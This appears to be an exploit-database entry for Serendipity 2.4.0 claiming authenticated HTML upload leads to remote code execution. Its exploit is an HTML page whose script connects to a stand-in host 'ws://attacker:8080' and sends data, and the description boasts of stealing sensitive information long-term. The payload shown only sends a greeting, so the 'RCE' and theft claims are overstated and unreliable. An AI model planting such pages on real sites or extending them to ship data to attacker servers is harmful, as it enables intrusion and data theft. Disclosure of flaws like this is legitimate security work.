Serendipity 2.4.0 – File Inclusion RCE

  • 作者: nu11secur1ty
    日期: 2023-05-02
  • 类别:
    平台:
  • 来源:https://www.exploit-db.com/exploits/51403/
  • ## Exploit Title: Serendipity 2.4.0 - File Inclusion RCE
    ## Author: nu11secur1ty
    ## Date: 04.26.2023
    ## Vendor: https://docs.s9y.org/index.html
    ## Software: https://github.com/s9y/Serendipity/releases/tag/2.4.0
    ## Reference: https://portswigger.net/web-security/file-upload
    ## Reference: https://portswigger.net/web-security/file-upload/lab-file-upload-remote-code-execution-via-web-shell-upload
    
    ## Description:
    The already authenticated attacker can upload HTML files on the
    server, which is absolutely dangerous and STUPID
    In this file, the attacker can be codding a malicious web-socket
    responder that can connect with some nasty webserver somewhere. It
    depends on the scenario, the attacker can steal every day very
    sensitive information, for a very long period of time, until the other
    users will know that something is not ok with this system, and they
    decide to stop using her, but maybe they will be too late for this
    decision.
    
    STATUS: HIGH Vulnerability
    
    [+]Exploit:
    ```HTML
    <!DOCTYPE html>
    <html>
    <head>
    	<meta charset="utf-8">
    	<title>NodeJS WebSocket Server</title>
    </head>
    <body>
    	<h1>You have just sent a message to your attacker,<br>
    	<h1>that you are already connected to him.</h1>
    <script>
    const ws = new WebSocket("ws://attacker:8080");
    ws.addEventListener("open", () =>{
    console.log("We are connected to you");
    ws.send("How are you, dear :)?");
    });
    
    ws.addEventListener('message', function (event) {
    console.log(event.data);
    });
    </script>
    </body>
    </html>
    
    ```
    
    ## Reproduce:
    [href](https://github.com/nu11secur1ty/CVE-nu11secur1ty/tree/main/vendors/s9y/2023/Serendipity-2.4.0)
    
    ## Proof and Exploit:
    [href](https://streamable.com/2s80z6)
    
    ## Time spend:
    01:27:00
    
    
    -- 
    System Administrator - Infrastructure Engineer
    Penetration Testing Engineer
    Exploit developer at https://packetstormsecurity.com/
    https://cve.mitre.org/index.htmlhttps://cxsecurity.com/ and
    https://www.exploit-db.com/
    0day Exploit DataBase https://0day.today/
    home page: https://www.nu11secur1ty.com/
    hiPEnIMR0v7QCo/+SEH9gBclAAYWGnPoBIQ75sCj60E=nu11secur1ty <http://nu11secur1ty.com/>